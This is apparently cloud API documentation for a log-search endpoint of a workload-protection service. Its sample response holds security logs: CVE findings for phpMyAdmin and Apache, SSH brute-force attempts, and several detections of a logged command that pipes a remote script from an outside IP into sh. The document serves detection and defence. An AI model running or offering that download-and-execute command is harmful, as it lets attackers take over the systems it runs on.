Domain name for API request: cwp.intl.tencentcloudapi.com.
This API is used to query logs.
A maximum of 20 requests can be initiated per second for this API.
The following request parameter list only provides API request parameters and some common parameters. For the complete common parameter list, see Common Request Parameters.
Parameter Name | Required | Type | Description |
---|---|---|---|
Action | Yes | String | Common Params. The value used for this API: SearchLog. |
Version | Yes | String | Common Params. The value used for this API: 2018-02-28. |
Region | No | String | Common Params. This parameter is not required. |
StartTime | Yes | Integer | Start time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds |
EndTime | Yes | Integer | End time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds |
QueryString | Yes | String | Statement for search and analysis, with a maximum length of 12 KB |
Count | No | Integer | Number of raw logs returned for a single query. Maximum value: 1000. The Context parameter can be used to obtain subsequent logs. |
Sort | No | String | Order for returning the raw logs. Valid values: asc (ascending), desc (descending). Default value: desc. |
Context | No | String | Pass the Context value returned by the last API call to retrieve more subsequent logs. A total of up to 10,000 raw logs can be obtained, with a validity period of 1 hour. |
Parameter Name | Type | Description |
---|---|---|
Count | Integer | Number of raw logs matching the retrieval criteria |
Context | String | Pass through the Context value returned by this API, which can access more logs later, with an expiration time of 1 hour. |
ListOver | Boolean | Whether all logs meeting the retrieval criteria have been returned. If not, use the Context parameter to retrieve more logs. |
Analysis | Boolean | Whether the returned data is the SQL analysis result |
Data | Array of LogInfo | Raw logs matching the retrieval criteria |
RequestId | String | The unique request ID, generated by the server, will be returned for every request (if the request fails to reach the server for other reasons, the request will not obtain a RequestId). RequestId is required for locating a problem. |
POST / HTTP/1.1
Host: cwp.intl.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: SearchLog
<Common request parameters>
{
"Sort": "desc",
"Count": "20",
"QueryString": "",
"StartTime": "1656641065449",
"EndTime": "1656641965449"
}
{
"Response": {
"Analysis": false,
"Context": "",
"Count": 17,
"Data": [
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability on form structure page.\",\"id\":\"771\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.6-90 and above or 2.4.39 and above\",\"cve_id\":\"CVE-2019-0217\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_auth_digest race condition vulnerability\",\"id\":\"767\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_auth_digest module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-19/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5703\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin central_columns.lib.php SQL injection vulnerability\",\"id\":\"772\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92512\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. Upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6633\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin dbase extension remote code execution vulnerability\",\"id\":\"764\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\",\"path\":\"\",\"fix\":\"Upgrade Apache HTTP Server to version 2.4.46\",\"cve_id\":\"CVE-2020-9490\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server http2_module denial-of-service vulnerability\",\"id\":\"769\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_http2 module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92209\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version and avoid using weak passwords.\",\"cve_id\":\"CVE-2016-5734\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin authorized user remote command execution vulnerability\",\"id\":\"768\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-40/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6617\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x SQL injection vulnerability of export feature\",\"id\":\"765\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/display_export.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-25/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5732\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability\",\"id\":\"770\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.44 and later.\",\"cve_id\":\"CVE-2020-11984\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_proxy_uwsgi buffer overflow vulnerability\",\"id\":\"766\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_proxy_uwsgi module enabled, and the version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1.\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641844000
},
{
"Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641824000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:10:03 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:10:01 +0800 CST\",\"id\":\"3141559\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641520000
},
{
"Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641484000
},
{
"Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641464000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:07:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:07:01 +0800 CST\",\"id\":\"3141558\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641280000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:05:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:05:01 +0800 CST\",\"id\":\"3141557\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641160000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:04:05 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:04:01 +0800 CST\",\"id\":\"3141556\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
"FileName": "",
"Source": "30.46.128.22",
"TimeStamp": 1656641160000
}
],
"ListOver": true,
"RequestId": "e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3"
}
}
TencentCloud API 3.0 integrates SDKs that support various programming languages to make it easier for you to call APIs.
There is no error code related to the API business logic. For other error codes, please see Common Error Codes.
本页内容是否解决了您的问题?